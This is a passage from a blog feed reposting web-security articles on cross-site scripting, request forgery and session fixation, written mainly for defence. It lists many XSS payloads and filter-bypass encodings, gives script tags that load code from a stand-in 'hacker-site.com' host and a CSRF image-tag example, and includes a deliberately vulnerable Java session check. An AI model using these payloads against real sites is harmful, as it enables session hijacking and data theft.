shell commands, and take over the server. A similar situation could occur if your script uses that data to construct a shell command.</p><h4 id="trusturl">Never trust URLs you are given</h4><p>Some pages allow a form to submit a "next URL" value, that the user will be redirected to after the data has been processed. Sometimes this is done with a Location header, but sometimes it is done with a meta refresh or JavaScript. With meta refreshes and JavaScript, if the URL that is given is a 'javascript:' URL, then the script will run. A malicious site could easily use this as a way to post scripts onto a page. Always check that URLs provided as form data start with a trusted protocol, such as 'http:' or 'https:'.</p><h4 id="carefulscript">Being careful with scripts</h4><p>In very rare cases, cross site scripting vulnerabilities are created within JavaScripts. Although far less common than server-side script mistakes, it is still possible to make equivalent mistakes in JavaScript. JavaScripts can read data passed in the URL, and must be careful how they process that data. If they assign that data to any object that accepts url values, such as the <var>src</var> of an image or the <var>location</var> object, any scripts can be injected into it.</p><p>An example of where this usually occurs is an image gallery script, where the image to display is passed as a parameter to the page address, and a script then extracts it to display the image. If a script accepts URLs as a parameter, it must always check that the URL starts with a trusted protocol, such as 'http:' or 'https:', or it will leave itself open to this sort of attack:</p><pre><code>http://goodsite.com/gallery.html?showimage=javascript:evil-script-here</code></pre><p>Similarly, if the data is evaluated by the page using the <var>eval</var> or an equivalent method, attackers can simply feed their script directly into that parameter. A script must <em>never</em> evaluate something passed as a parameter to the page.</p><h4 id="httponly">Using HTTP-only cookies</h4><p>Cookies that are set via HTTP (such as authentication cookies) are also available to scripts. One of the most common demonstrations used for cross site scripting, is taking another user's login cookie, and then performing some action as them. If the cookie was not available to scripts, they could not take them. Internet Explorer and recent versions of some other browsers allow an optional 'httponly' parameter when setting HTTP cookies, which prevents them from being accessible to scripts.</p><p>This is not a solution, as it has only limited scope. For a start, this is only useful if <em>all</em> browsers support it - as I have already said, the exploit only needs to work once in one browser for it to be successful. More importantly, however, cookies are rarely used in real exploits. Someone who manages to inject a script into someone else's page is not very likely to use their cookie themselves, as that would immediately give away their IP address, making it easier to locate and prosecute them. They are far more likely to run a script there and then, to do the damage through the user themself. HTTP-only cookies give a false sense of security; they may protect some people from demonstrations, but they will not protect from real attacks.</p><p>Of course, the main point is that it should never be allowed to get to this stage. XSS should be prevented at all costs. If you have a XSS vulnerability in your site, then cookie stealing is the least of your problems. Fix the real problem, not the symptom.</p><h4 id="httpauth">Using HTTP authentication</h4><p>HTTP authentication is like the HTTP-only cookie, except that it works in all browsers. It still suffers from the same false sense of security, however, and in addition, no browser currently allows you to log out of it, meaning it is more susceptible to delayed XSRF attacks.</p><h4 id="safecookie">Storing safer cookies</h4><p>Some sites take the simple approach of saving the user's username and password in the cookie. This is an instant giveaway if a XSS attack manages to get the cookie, as they have the username and password. Even if the user logs out, the attacker can log in again. It is better to store a unique session ID. That way, if they log out and the server invalidates the session, the attacker can no longer do anything with the cookie. To make it even harder for an attacker, the server can tie the session ID to the user's IP address. Attackers would have to be able to use the same IP address for them to exploit it - this is possible (for example, they may be behind the same NAT), but it makes it much harder.</p><p>However, again, cookies are only a minor concern considering that the XSS vulnerability can be exploited in a number of ways, that do not need any cookie at all.</p><h4 id="certainhtml">Allowing only certain HTML input</h4><p>Some people want to allow certain HTML to be used, but not others. Typically, this is for forums, where users should only be allowed to enter basic HTML that does not affect other users, or blogs, where comments should only use basic HTML. This is certainly not trivial, and unless you are very experienced in avoiding XSS attacks, I suggest you leave well alone, and escape everything.</p><p>However, if you feel that you know enough to do this, then prepare to step into a minefield.</p><p>The basic idea is not to remove anything you think is dangerous, but to remove <em>everything</em> unless you know it is safe. The number of ways that scripts can be added to a document is quite staggering - some of these only work in certain browsers, but it only takes one of these to work in one browser for the exploit to be a success:</p><ul id="waystorun"><li>A script tag.</li><li>A script tag that has a namespace prefix in its tag name;<pre><code><div xmlns:foo="http://www.w3.org/1999/xhtml">
<foo:script>...script here...</foo:script>
</div></code></pre></li><li>Event handler attributes - these typically begin with 'on', and may have spaces before and after the '=' sign (and can also have a namespace prefix).</li><li>Link href (A, AREA or LINK elements, or XML processing instructions), base href, image src, input src, image usemap, form actions, input actions, xform submission actions, object data (or equivalent PARAMs such as url), object codebase, embed src, applet code, applet archive, applet codebase, iframe src, frame src, img longdesc, iframe longdesc, frame longdesc, blockquote cite, q cite, ins cite, del cite, meta refresh, meta link, body/table/th/td background, XLink URLs, DOCTYPE SYSTEM identifiers, ENTITY SYSTEM identifiers, and generally any attribute that acceps a URI value - all of which can have a 'javascript:' URL (or a 'vbscript:' URL in IE).</li><li>Any of those within a custom namespace.</li><li>Any attribute in Netscape 4 that uses JavaScript entities (or script macros) such as <code>align="&{...script...};"</code>.</li><li>Any of those elements (or a parent element) using xml:base with a 'javascript:' URL as its value.</li><li>CSS <code>url(javascript:...)</code> values (these can also be in imported or linked stylesheets).</li><li>CSS <code>@import "javascript:..."</code> (these can also be in imported or linked stylesheets).</li><li>CSS <var>-moz-binding</var> or <var>behavior</var> (these can also be in imported or linked stylesheets).</li><li>CSS <var>expression</var> (these can also be in imported or linked stylesheets).</li><li>HTML style attributes that use any of those CSS methods.</li><li>Iframes, frames, links, etc. with 'data:' URLs of pages containing scripts (currently these are treated by some browsers - but not all - as a script from another domain, but that is not a requirement, and browsers may change in future, since a same-domain response is expected and more useful).</li><li>Objects, embeds or applets that then run a script on the parent page (in most browsers this is allowed without any of the usual cross domain restrictions).</li><li>XML entities, which can contain any other scriptable content, and hide it behind a harmless-looking entity reference: <pre><code><!DOCTYPE foo [
<!ENTITY bar '<script xmlns="http://www.w3.org/1999/xhtml">...script here...</script>'>
]>
<foo>&bar;</foo></code></pre>These can also be defined in a remote file, which is loaded through a harmless-looking URL: <pre><code><!ENTITY bar SYSTEM "http://example.com/extra.xml"></code></pre> Or even indirectly via a custom DOCTYPE, which then contains the entity references: <pre><code><!DOCTYPE foo SYSTEM "http://example.com/untrusted.dtd"></code></pre></li><li>XSLT which creates scripts using any of the other points (XSLT itself can also be very damaging).</li><li>XBL which makes additional elements or attributes become scriptable.</li><li>XUL which contains script elements or scriptable attributes.</li><li>Conditional comments, which can then contain any other HTML, but appear to be only a comment.</li><li>Script within SVG images (or equivalent namespaced script elements).</li><li>XML events 'listener' elements or namespaced attributes.</li><li>VoiceXML and VoiceXML events.</li><li>XML processing instructions (like <code><xml-stylesheet href="javascript:..."></code>).</li></ul><p>There are certainly many other ways to put a script into a page, and that is why I call this a minefield. You absolutely must not blacklist elements or attributes you know are dangerous. You must whitelist those that you know are safe. Even seemingly safe elements such as LINK (or the related CSS <code>@import</code> rules) can end up importing a stylesheet from an untrusted source that contains the harmful content described above.</p><p>As well as whitelisting elements, you must also whitelist the attributes that each of them may have. Anything that is not on your whitelist must be removed, or deliberately altered so that it no longer functions as the element or attribute it is intended to be. PHP has a function that is supposed to help do this, called <var>strip_tags</var>. However, this copes very badly with invalid HTML, and it is possible to bypass it by feeding it specially broken HTML.</p><p>Stripping tags is a fine art, and can be exceptionally difficult, as you must be able to cope with intentionally broken HTML, designed so that after the tags have been stripped, what remains is another tag that was created by the removal of another one. An example would be this:</p><pre><code><<script>script>...evil script...<</script>/script></code></pre><p>Stripping them multiple times would be equally uneffective (unless a matching 'while' loop was used until the tags had been removed), as they could be nested to indefinite levels, but could end up with something that browsers understand.</p><p>Remember that "LiNk", "LINK" and "link" are all considered to be the same tag in HTML. In XHTML, namespaced elements can also be the same as non-namespaced ones. For the sake of simplicity, it is easiest to remove anything that is namespaced; if someone is trying to use a namespace in a forum post or blog comment, then they are probably trying to exploit something anyway.</p><p>Once tags have been stripped, attributes must also be stripped, to remove any attributes that are not considered safe, or required (the <var>HREF</var> attribute of a link and the <var>SRC</var> attribute of an image are not safe, but are usually needed anyway). If there is any chance that any of your users may still be using Netscape 4, then every attribute, even if normally safe, needs to be sanitised to remove JavaScript entities.</p><p>For removing tags and attributes, you may find it more effective to use a simple XML parser that only allows the non-namespaced tags and attributes you have decided to allow. Anything else can throw an error (make sure it does not attempt to display the rendered output in the error message, or you will be back where you started).</p><p>Finally, now that you have only the markup you want to allow, you must now ensure that unsafe attributes have their contents sanitized so that JavaScript URLs and data URIs are removed. This can be more difficult than it sounds.</p><p>Removing all instances of 'javascript:' will simply not be good enough. For a start, if the content initially contained something like this, removing instances of 'javascript:' will leave it with 'javascript:':</p><pre><code>jajavascript:vascjavascript:ript:</code></pre><p>A while loop would be able to take care of that, but there are several cases where browsers can be tricked into treating something as a 'javascript:' URL, even though it does not look like one. Some may work in only a few browsers, some will work in all of them. Examples would be these:</p><pre><code>ja<![CDATA[vasc]]>ript:
jav&#x09;ascript:
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;
url("java\scr\ipt:...")
u\r\00006C\000028"\00006A\00061\0076\061\73\63\72\69\70\74\3A...")</code></pre><p>The list of these is very extensive - some work in only selected browsers, but quite simply, if you intend to allow HTML, you must be able to recognise and disable <em>all</em> of them. See the <a href="http://ha.ckers.org/xss.html">XSS cheat sheet</a> for a fairly complete list. Note that some browsers also support other potentially dangerous protocols. IE also supports 'vbscript:', BrowseX also supports 'tcl:', Netscape 4 also supports 'mocha:' and 'livescript:' which are synonymous to 'javascript:', several Mac browsers support 'applescript:' (although supposedly that is safe), and no doubt there are other obscure browsers that support scripting in other languages with their own protocols, such as 'cpp:'. Many browsers support the 'data:' protocol, which in some of them will be treated as a file from the current domain, and can contain scripts. Mozilla browsers support the 'jar:' protocol, which can be used to unpack individual files from zip archives, jar archives, doc files, odt files, etc., and run them in the context of the site they are stored on (due to a bug, it also does not update the context if the URL triggers a redirect), which can be a major problem if you allow arbitrary files to be uploaded or otherwise attached to the Web site, such as with Web mail. It can even refer to a zip file contained in a 'data:' URL, meaning that it does not need to be uploaded, and can all be contained within the URL.</p><p>Future versions of major browsers may also support other potentially dangerous protocols. Remember that more ways to trick browsers into running scripts are discovered all the time, and you will need to keep your pages protected against them. An easy way to do this is to always insist that every URL a user provides must start with 'http:' or 'https:' (or 'ftp:', if you want to allow that). This is by far the best protection, as it ensures that only those safe protocols can be linked to, even if it may be slightly more inconvenient for the user to type. Other protocols you might want to consider safe are: 'mailto:', 'irc:', 'ircs:', 'gopher:', 'news:', 'nntp:', 'feed:', 'wap:', 'wtai:', 'about:', 'opera:', 'smsto:', 'mmsto:', 'tel:', 'fax:', 'ed2k:', 'dchub:', 'magnet:'. I do not recommend whitelisting streaming media protocols, for reasons given above and below. Be warned that with META refresh tags, some browsers allow multiple instances of the target URL, and any one could contain the scripted protocol.</p><p>Failing to cope with all of these possibilities could lead to a fully fledged attack being launched against your site. The <a href="http://namb.la/popular/tech.html">MySpace worm</a> is a good example of the lengths that you will need to go to, to protect yourself against these attacks.</p><h4 id="bbcode">Using <abbr title="Bulletin Board">BB</abbr> code</h4><p>BB code is like a simplistic version of HTML. There are several variations - wikis generally have their own syntax that serves a similar purpose. The general idea is that instead of using normal HTML, the user is allowed to enter only a small selection of HTML equivalents, that are then converted into the HTML they represent, with all other content escaped.</p><p>This makes it easier to work out what is or is not allowed - if it does not match the exact patterns, it is not converted. This can be less difficult than having to detect which parts to remove, as the parts of HTML that end up being used are generated by the server, and will not include anything that is considered dangerous.</p><p>However, this approach still does not cover 'javascript:' URLs (or other dangerous protocols) in permitted attributes, such as link href, and image src. These will still need to be taken care of, including all the possible variations, as described above.</p><h4 id="trust">Embedding content from other sites</h4><p>It is possible to use content from other sites, such as images or scripts, from other sites (a practice sometimes known as "hotlinking"), using an absolute URL:</p><pre><code><img src="http://othersite.com/someimage.jpg" alt="">
<script src="http://othersite.com/somescript.js" type="text/javascript"></script>
<iframe src="http://othersite.com/somepage.html"></iframe></code></pre><p>In some cases, such as images and iframes, scripting is not a problem, since the JavaScript security model will not allow scripts on pages from one domain to interact with pages on another. However, it is not always safe. If the other site decided to abuse this situation (perhaps in order to get back at your site for wasting their bandwidth by hotlinking), they could rewrite the script hotlinked by your site, to make it do something unexpected, with as much abusive power as cross site scripting. Even with pages in frames or iframes, they could display fake login forms, or inappropriate information convincing the user to give them sensitive information. Since the content appears to the user to be part of your site, they might trust it. It is important that you do not embed content from other sites unless you really trust them.</p><p>Plugins are also an extremely effective example. The plugin API allows plugin content to interact with scripts on the page (or create their own), without restriction. The plugin can be hosted on any domain, but if it is embedded on your page (using the <var>OBJECT</var> or <var>EMBED</var> elements, but not frames), it can run scripts as part of your page without being stopped by the JavaScript security model. This is different to other types of page content.</p><p>In the case of Flash, there is an optional <var>ALLOWSCRIPTING</var> parameter that can be set to <code>"never"</code> which will prevent the flash movie from communicating with JavaScript, but Flash is just one of many possible plugins, and others do not have an equivalent. Embedding plugin content from other sites, or allowing users to do so, basically opens your site up to cross site scripting attacks.</p><p>The same problem is true in reverse. If you produce plugin content, and that content has access to sensitive information, some other site may embed your content in their own page, and start interacting with it using scripts. If the information can be accessed through scripts, then it can be accessed by any page that embeds your plugin content. This is of particular importance to Flash-based shopping sites, or plugin-based security systems. The plugin itself may offer some form of protection (such as checking the hosting domain), but this is up to the individual plugin, and you should refer to that plugin's documentation for more information about protecting your content from remote scripting.</p><h3 id="xsrfprotect">Cross site request forgery</h3><p>XSRF attacks are based on knowing what the URL will look like, and knowing exactly what data the server expects to be passed, in order to perform an action, such as changing database data, or purchasing items.</p><pre><code>http://goodsite.com/delete.php?delete=all</code></pre><p>They also rely on the target site thinking that the user themself submitted the form, or requested the action from the site itself, and not another site.</p><p>Any solution must make it impossible for another site to do either of these.</p><p>XSRF attacks also rely on the user being logged in, and to visit the exploiting page, while the attack is carried out. These conditions require a certain amount of social engineering, and the success rate will also depend on timing. However, it only needs to be successful once for the effects to be extremely damaging. The solutions I will present are not exhaustive, you may also find others, but I recommend you use a combination of these approaches.</p><p>Some proposed solutions attempt to use multi-page forms to ensure the correct submission path is followed, and use POST instead of GET as the form method. Neither of these offers effective protection. Both make things a little harder for the attacker, but can fairly easily be circumvented. They can use a real form to get POST to work, and use timed submission in frames, iframes, or popups to simulate multi-page submission.</p><p>Although XSRF attacks are usually referred to with two separate sites being involved, this is not a requirement. Blogs and forums are very easy targets. For example, if you post an entry on your blog, and somebody comments, they can put HTML code in the comment that causes the blog post to be deleted as soon as you look through your comments.</p><pre><code><img src="http://blogsite.com/deletepost.php?id=23456"></code></pre><p>These attacks can also be carried out through BB code or wiki syntax, as long as an element is allowed that has a URL value. Considering <a href="http://www.howtocreate.co.uk/crosssite.html#waystorun">how many elements have URI values</a>, this is a fairly reliable attack. It also has the added benefit that users will usually be logged in while viewing comments on their own blog or forum. This particular type of attack can be partially protected against by insisting that forms that request actions use POST instead of GET, but as I have already said, POST is definitely not a complete solution to the XSRF problem.</p><h4 id="sessionurl">Encode a session ID in the URL</h4><p>This is a fairly simple way to make it virtually impossible for a malicious site to predict what the URL of the target page will be. Make sure that the session ID is sufficiently long and unpredictable, so that the site cannot simply try multiple combinations until one works. 20 random characters should usually be sufficient, but you may want to use more.</p><p>Unfortunately, this means that the site will need to generate <em>every</em> page to make sure that the session ID is used by every page, every link, every form (as a hidden input). It is not convenient, but it is very effective protection.</p><h4 id="referrer">Check referrers</h4><p>If a page containing a form or link is supposed to be the only page that can send data to a server-side processing script to request an action, then that processing page should check the referrer header to make sure that the page that requested the action was the correct page. Any requests from other pages (including if no referrer is sent, or if it is blank), should not cause any processing, and instead, should display a warning saying that the referrer header was not correct.</p><p>Note that some browsers can disable the referrer header if the user requests it - they should be asked to enable it again. Some browsers never send a referrer header. If you intend to use the referrer header as a security precaution, then these browsers will simply not be able to use the site. It is important not to allow requests that do not have a referrer, as an exploiting site could use a trick to prevent a browser sending the header, and this must not be mistaken for a browser that never sends one.</p><p>This on its own is <em>not</em> a complete solution for multi-user sites such as blogs, blog comments, or forums, as the attacker may be able to create forms or equivalent links on the page itself and convince you to click a button to initiate the action.</p><h4 id="pwdprompt">Prompting for passwords</h4><p>This is a very unpopular idea, but it is a very effective way of ensuring that the user is themself, and not a page that has posted form data as that user. The form that submits data to the processing page should also have a field where the user must enter their password (yes, even though they are already logged in). If the password is not correct, then the processing page must not process the data. Attacking pages will not know the user's password, so they will not be able to fake the form submission.</p><h4 id="idsubmission">Pass unique IDs in form submission</h4><p>Instead of having to encode a unique session ID in every page, include it in a hidden input in the form that submits to the processing page. This can be the same as the user's session ID that is held in a cookie. With XSRF attacks, the attacker does not know what the user's session ID is, so they will not be able to send that part of the form data. The processing page should then check for that session ID, and if it does not find it, it should reject the submission.</p><h3 id="securesites">Secure sites</h3><p>Many sites, such as shopping and banking, use encrypted connections to allow users to ensure that they are talking to the correct site, and to prevent attackers from sniffing network data packets. These require a whole new level of attack (as well as the XSS and XSRF attacks), but considering the amounts of money involved, these attacks are profitable enough to be done.</p><p>Encrypted connections do a lot more than just encrypting data sent by the user. They also encrypt pages sent <em>to</em>the user, and offer a certificate path that allows the user to ensure they are talking to the real site before they give it any sensitive information.</p><p>Typical attacks would involve intercepting and rewriting a page before the user receives it. This could be done through a compromised router, for example. Another would be to use a compromised DNS server to point the user to the wrong server that pretends to be the real site - the user's address bar will of course show the correct site, and it could even be encrypted. Strictly speaking, these are not cross site scripting attacks, but the effects are the same; some content of the page is changed by a third party, so that sensitive information can be sent to them instead.</p><p>Secure connections can deal with both of these situations. Firstly, an encrypted connection can be intercepted, but the attacker cannot read or rewrite the page content, unless they can break the encryption fast enough. This is why it is important to use high level (typically 128 bit) encryption, as it is not currently possible to break within the lifespan of the attacker. Some of the lower level older encryptions (56 bit) can be broken within just a few seconds.</p><p>Encrypted connections also offer the ability to check the certification path. This is also virtually impossible to fake, so a user can check the certificate to make sure it is the right company. The browser can check the certification path to ensure the certificates are valid, and that the certification path is correct. Any failures will cause a browser to display warnings to the user so they are aware that the site may not be who it claims to be.</p><p>The first and one of the biggest mistakes a site can make is to use both secure and insecure content on the same page. An attacker only needs to compromise one file in order to carry out a successful attack. If they compromise the insecure content (such as replacing a safe script file with an unsafe one), the secure content is compromised as well. This mix of content security happens on quite a few sites, and browsers usually display warnings, but are moving towards denying it altogether.</p><p>The next most stupid mistake is to have the login form on an insecure page, that posts the login information to the secure page. It assumes that since the data is encrypted when it is sent, that everything is OK. This happens on a disturbingly high number of bank sites, especially those in the USA.</p><p>The problem with this approach is that the user should be able to check the site is real <strong>before</strong> they give it their information. If the DNS has been compromised, they would only find that out <em>after</em> they have sent their login details to the wrong site. If the page has been altered by a compromised router, for example, to change the action of the form, the user would not know about it until after they sent their data to the wrong site (or if it then sent them to the real site, they would never know).</p><p>Very occasionally, there is the problem that an encrypted site sends data - via forms, XMLHttpRequest, or any other means - to an insecure page, either directly or via a redirect. Packet sniffing and rewriting means that an attacker has immediate access to that information.</p><p>Secure sites need to ensure that they do not make any of these mistakes, as well as not allowing XSS and XSRF attacks.</p><p><strong><a href="https://youngsam.net/entry/What-is-cross-site-scripting?commentInput=true#entry1548WriteComment">댓글 쓰기</a></strong></p>Cross Site Scripting Attackopenkrhttps://youngsam.net/entry/Cross-Site-Scripting-Attack2011-09-14T02:15:39+09:002011-09-14T02:15:39+09:00<h1><font size="2">Cross Site Scripting 해킹 관련 자료 입니다. 무료 테스트 버전도 있네요.<br></font><br>Cross Site Scripting Attack</h1><strong>What is Cross Site Scripting?</strong><br><p>Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records.</p><p>Cross Site Scripting (also known as <a href="http://www.acunetix.com/websitesecurity/xss.htm">XSS</a> or CSS) is generally believed to be one of the most common application layer hacking techniques.</p><p>In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID) clearly shows that whilst many different attack methods exist, SQL injection and XSS are the most popular. To add to this, many other attack methods, such as Information Disclosures, Content Spoofing and Stolen Credentials could all be side-effects of an XSS attack.</p><p align="center"><img border="0" alt="Top Web Attack Methods from the Web Hacking Incident Database WHID" src="http://www.acunetix.com/general/images/websitesecurity/WHID_top_web_hacking_methods.png" width="568" height="317"></p><p><strong>In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.</strong></p><p>Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data.</p><p>"A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions." (CERT Coordination Center).</p><p>Cross Site Scripting allows an attacker to embed malicious <a href="http://www.acunetix.com/websitesecurity/javascript.htm">JavaScript</a>, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.</p><p>As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website.</p><p>Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…</p><p>N.B. Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).</p><strong>The Theory of XSS</strong><br><p>In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.</p><p align="center"><img border="0" alt="A high level view of a typical XSS attack" src="http://www.acunetix.com/general/images/websitesecurity/xssattack.png" width="568" height="317"></p><p>As a web developer you are putting measures in place to secure the first step of the attack. You want to prevent the hacker from infecting your innocent web page with his malicious script. There are various ways to do that, and this article goes into some technical detail on the most important techniques that you must use to disable this sort of attack against your users.</p><strong>XSS Attack Vectors</strong><br><p>So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.</p><p>Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.</p><p>By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?</p><p><strong><SCRIPT></strong></p><p>The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:</p><p>External script:</p><p><code><SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT></code></p><p>Embedded script:</p><p><code><SCRIPT> alert(“XSS”); </SCRIPT></code></p><p><strong><BODY></strong></p><p>The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:</p><p><code><BODY ONLOAD=alert("XSS")></code></p><p>The BACKGROUND attribute can be similarly exploited:</p><p><code><BODY BACKGROUND="javascript:alert('XSS')"></code></p><p><strong><IMG></strong></p><p>Some browsers will execute a script when found in the <IMG> tag as shown here:</p><p><code><IMG SRC="javascript:alert('XSS');"></code></p><p>There are some variations of this that work in some browsers:</p><p><code><IMG DYNSRC="javascript:alert('XSS')"></code><br><code><IMG LOWSRC="javascript:alert('XSS')"></code></p><p><strong><IFRAME></strong></p><p>The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.</p><p><code><IFRAME SRC=”http://hacker-site.com/xss.html”></code></p><p><strong><INPUT></strong></p><p>If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:</p><p><code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code></p><p><strong><LINK></strong></p><p>The <LINK> tag, which is often used to link to external style sheets could contain a script:</p><p><code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code></p><p><strong><TABLE></strong></p><p>The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:</p><p><code><TABLE BACKGROUND="javascript:alert('XSS')"></code></p><p>The same applies to the <TD> tag, used to separate cells inside a table:</p><p><code><TD BACKGROUND="javascript:alert('XSS')"></code></p><p><strong><DIV></strong></p><p>The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:</p><p><code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code></p><p>The <DIV> STYLE attribute can also be manipulated in the following way:</p><p><code><DIV STYLE="width: expression(alert('XSS'));"></code></p><p><strong><OBJECT></strong></p><p>The <OBJECT> tag can be used to pull in a script from an external site in the following way:</p><p><code><OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"></code></p><p><strong><EMBED></strong></p><p>If the hacker places a malicious script inside a flash file, it can be injected in the following way:</p><p><code><EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"></code></p><strong>Is your site vulnerable to Cross Site Scripting?</strong><br><p>Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward.</p><strong>Example of a Cross Site Scripting Attack</strong><br><p>As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for.</p><p>Search Results for "XSS Vulnerability"</p><p>To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like:</p><p>http://test.searchengine.com/search.php?q=XSS%20</p><p>Vulnerability</p><p>Next we try to send the following query to the search engine:</p><p><script type="text/javascript"> alert ('This is an XSS Vulnerability')< /script></p><p>By submitting the query to search.php, it is encoded and the resulting URL would be something like:</p><p>http://test.searchengine.com/search.php?q=%3Cscript%3</p><p>Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%2</p><p>9%3C%2Fscript%3E</p><p>Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.</p><p></p><strong>How to Check for Cross Site Scripting Vulnerabilities</strong><br><p>To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for <a href="http://www.acunetix.com/websitesecurity/sql-injection.htm">SQL injection</a> & other web vulnerabilities.</p><p><a href="http://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a> scans for <a href="http://www.acunetix.com/websitesecurity/sql-injection.htm">SQL injection</a>, Cross site scripting, <a href="http://www.acunetix.com/websitesecurity/google-hacking.htm">Google hacking</a> and many more vulnerabilities.</p><strong>Preventing Cross Site Scripting Attacks</strong><br><p>The purpose of this article is define Cross Site Scripting attacks and give some practical examples. Preventing XSS attacks requires diligence from the part of the programmers and the necessary security testing. You can <a href="http://www.acunetix.com/blog/web-security-zone/articles/preventing-xss-attacks/" target="_blank">learn more about preventing cross-site scripting attacks here.</a></p><p><strong>Scanning for XSS Vulnerabilities with Acunetix Web Vulnerability Scanner Free Edition!</strong><br>To check whether your website has cross site scripting vulnerabilities, download the Free Edition from <a href="http://www.acunetix.com/cross-site-scripting/scanner.htm">http://www.acunetix.com/cross-site-scripting/scanner.htm</a>. This version will scan any website / web application for <a href="http://www.acunetix.com/websitesecurity/xss.htm">XSS</a> vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site).</p><p><strong><a href="https://youngsam.net/entry/Cross-Site-Scripting-Attack?commentInput=true#entry1547WriteComment">댓글 쓰기</a></strong></p>세션 고정 취약성의 예openkrhttps://youngsam.net/entry/%EC%84%B8%EC%85%98-%EA%B3%A0%EC%A0%95-%EC%B7%A8%EC%95%BD%EC%84%B1%EC%9D%98-%EC%98%882011-09-14T02:02:11+09:002011-09-14T02:02:11+09:00 private boolean authenticateUser(HttpServletRequest req)<br> {<br> // session.invalidate() should have been called prior to this<br> // to invalidate an existing session<br><br> HttpSession session = req.getSession(false);<br> if (null != session)<br> {<br> // existing session assumed valid<br> return true;<br> }<br><br> if (authenticateRequest(req) == true)<br> {<br> // create a new session<br> req.getSession();<br> return true;<br> }<br> <br> return false;<br> }<br><p><strong><a href="https://youngsam.net/entry/%EC%84%B8%EC%85%98-%EA%B3%A0%EC%A0%95-%EC%B7%A8%EC%95%BD%EC%84%B1%EC%9D%98-%EC%98%88?commentInput=true#entry1545WriteComment">댓글 쓰기</a></strong></p>XSS(Cross Site Scripting) - 크로스 사이트 스크립팅openkrhttps://youngsam.net/entry/XSSCross-Site-Scripting-%ED%81%AC%EB%A1%9C%EC%8A%A4-%EC%82%AC%EC%9D%B4%ED%8A%B8-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8C%852011-09-14T01:56:54+09:002011-09-14T01:40:01+09:00<span style="color: rgb(153, 0, 0);">오랜만에 XSS를 검색하다가 잘 정리된 사이트를 발견하여 정리해 둡니다.<br></span><br><blockquote>크로스 사이트 스크립팅은 매우 위험한 보안 노출로서 안전한 웹 기반 애플리케이션을 설계할 때 반드시 고려해야 한다. 이
글에서 노출의 본질과, 이것이 어떻게 영향을 미치는지를 설명하고 솔루션 전략을 소개한다. </blockquote>
